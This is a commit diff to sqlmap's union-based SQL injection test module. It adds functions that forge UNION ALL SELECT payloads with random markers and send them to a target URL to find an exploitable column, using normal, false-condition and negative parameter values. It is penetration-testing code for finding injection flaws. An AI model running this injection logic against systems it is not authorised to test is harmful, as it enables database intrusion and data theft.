Updated to sqlmap 0.7 release candidate 1

lib/techniques/inband/union/test.py

@@ -5,8 +5,8 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -25,14 +25,103 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
 
 from lib.core.agent import agent
+from lib.core.common import randomStr
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.session import setUnion
+from lib.core.unescaper import unescaper
+from lib.parse.html import htmlParser
 from lib.request.connect import Connect as Request
 
 
+def __unionPosition(negative=False, falseCond=False):
+    if negative or falseCond:
+        negLogMsg = "partial (single entry)"
+    else:
+        negLogMsg = "full"
+
+    infoMsg  = "confirming %s inband sql injection on parameter " % negLogMsg
+    infoMsg += "'%s'" % kb.injParameter
+
+    if negative:
+        infoMsg += " with negative parameter value"
+    elif falseCond:
+        infoMsg += " by appending a false condition after the parameter value"
+
+    logger.info(infoMsg)
+
+    # For each column of the table (# of NULL) perform a request using
+    # the UNION ALL SELECT statement to test it the target url is
+    # affected by an exploitable inband SQL injection vulnerability
+    for exprPosition in range(0, kb.unionCount):
+        # Prepare expression with delimiters
+        randQuery = randomStr()
+        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
+        randQueryUnescaped = unescaper.unescape(randQueryProcessed)
+
+        # Forge the inband SQL injection request
+        query   = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
+        payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)
+
+        # Perform the request
+        resultPage, _ = Request.queryPage(payload, content=True)
+
+        # We have to assure that the randQuery value is not within the
+        # HTML code of the result page because, for instance, it is there
+        # when the query is wrong and the back-end DBMS is Microsoft SQL
+        # server
+        htmlParsed = htmlParser(resultPage)
+
+        if randQuery in resultPage and not htmlParsed:
+            setUnion(position=exprPosition)
+
+            break
+
+    if isinstance(kb.unionPosition, int):
+        infoMsg  = "the target url is affected by an exploitable "
+        infoMsg += "%s inband sql injection vulnerability" % negLogMsg
+        logger.info(infoMsg)
+    else:
+        warnMsg  = "the target url is not affected by an exploitable "
+        warnMsg += "%s inband sql injection vulnerability" % negLogMsg
+
+        if negLogMsg == "partial":
+            warnMsg += ", sqlmap will retrieve the query output "
+            warnMsg += "through blind sql injection technique"
+
+        logger.warn(warnMsg)
+
+
+def __unionConfirm():
+    # Confirm the inband SQL injection and get the exact column
+    # position
+    if not isinstance(kb.unionPosition, int):
+        __unionPosition()
+
+        # Assure that the above function found the exploitable full inband
+        # SQL injection position
+        if not isinstance(kb.unionPosition, int):
+            __unionPosition(falseCond=True)
+
+            # Assure that the above function found the exploitable partial
+            # (single entry) inband SQL injection position by appending
+            # a false condition after the parameter value
+            if not isinstance(kb.unionPosition, int):
+                __unionPosition(negative=True)
+
+                # Assure that the above function found the exploitable partial
+                # (single entry) inband SQL injection position with negative
+                # parameter value
+                if not isinstance(kb.unionPosition, int):
+                    return
+                else:
+                    conf.paramNegative = True
+            else:
+                conf.paramFalseCond = True
+
+
 def __forgeUserFriendlyValue(payload):
     value = ""
 
@@ -119,9 +208,9 @@ def unionTest():
     else:
         technique = "NULL bruteforcing"
 
-    logMsg  = "testing inband sql injection on parameter "
-    logMsg += "'%s' with %s technique" % (kb.injParameter, technique)
-    logger.info(logMsg)
+    infoMsg  = "testing inband sql injection on parameter "
+    infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)
+    logger.info(infoMsg)
 
     value   = ""
     columns = None
@@ -138,9 +227,7 @@ def unionTest():
             break
 
     if kb.unionCount:
-        logMsg  = "the target url could be affected by an "
-        logMsg += "inband sql injection vulnerability"
-        logger.info(logMsg)
+        __unionConfirm()
     else:
         warnMsg  = "the target url is not affected by an "
         warnMsg += "inband sql injection vulnerability"